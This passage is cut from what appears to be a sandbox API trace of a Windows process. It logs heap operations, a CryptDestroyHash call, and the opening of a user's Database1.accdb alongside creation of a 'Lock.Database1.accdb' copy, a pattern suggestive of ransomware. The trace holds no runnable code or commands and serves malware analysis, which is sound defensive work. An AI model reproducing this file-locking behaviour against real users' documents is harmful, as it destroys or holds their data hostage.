wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0261.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0261.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0261.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0261.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0261.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0261.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0261.653] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0261.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0261.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0261.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0261.653] CryptDestroyHash (hHash=0xa87250) returned 1 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0261.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0261.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0261.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0261.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0261.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0261.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0261.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0261.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0261.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0261.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0261.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0261.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0261.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0261.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0261.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0261.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0261.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0261.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0261.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0261.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0261.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0261.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0261.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0261.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0261.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0261.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0261.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0261.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0261.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0261.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0261.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0261.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0261.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0261.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0261.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0261.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0261.660] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0261.660] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0261.661] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0261.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0261.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0261.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0261.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0261.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0261.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0261.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0261.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.662] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0261.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0261.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0261.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0261.662] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\lock.database1.accdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0261.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0261.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0261.663] 